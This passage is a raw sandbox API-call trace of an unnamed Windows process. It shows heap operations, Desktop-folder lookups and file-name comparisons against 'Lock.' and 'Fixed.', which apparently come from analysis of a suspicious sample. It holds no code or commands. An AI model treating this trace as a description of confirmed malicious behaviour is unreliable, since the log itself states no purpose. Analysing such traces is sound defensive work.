dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0159.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0159.276] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0159.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0159.276] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0159.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0159.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0159.276] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0159.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0159.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0159.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0159.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0159.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0159.277] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0159.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0159.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0159.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0159.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24202f0 [0159.278] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/0AFNgyUK36kK5YHPO1.odp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AFNgyUK36kK5YHPO1.odp", lpFilePart=0x8bf658*="0AFNgyUK36kK5YHPO1.odp") returned 0x3c [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0159.278] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0AFNgyUK36kK5YHPO1.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0afngyuk36kk5yhpo1.odp")) returned 0xffffffff [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0159.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0159.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0159.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0159.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0159.279] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0159.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0159.279] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0159.279] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0159.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0159.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0159.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0159.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0159.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0159.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0159.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0159.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0159.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0159.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0159.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0159.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0wIFgl.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0159.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wIFgl.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0159.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IFgl.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0159.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fgl.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0159.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gl.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0159.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l.pps", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0159.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0159.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0159.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0159.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0159.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0159.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0159.280] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0159.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0159.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0159.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0159.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0159.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0159.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0159.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0159.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0159.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0159.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0159.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0159.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0159.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0159.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0159.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466dd0 [0159.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0159.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0wIFgl.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0159.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wIFgl.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0159.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IFgl.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0159.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fgl.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0159.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gl.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0159.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0159.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0159.281] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0159.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0159.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0159.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0159.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0159.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0159.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0159.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0159.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0159.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0159.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0159.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0159.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0159.282] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0159.282] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0159.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0159.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0159.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0159.283] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0159.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0159.283] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0159.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0159.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0159.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0159.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0159.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0159.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0159.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0159.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x2416f30 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0159.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0159.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0159.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0159.285] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0159.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0159.285] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0159.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0159.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0159.286] 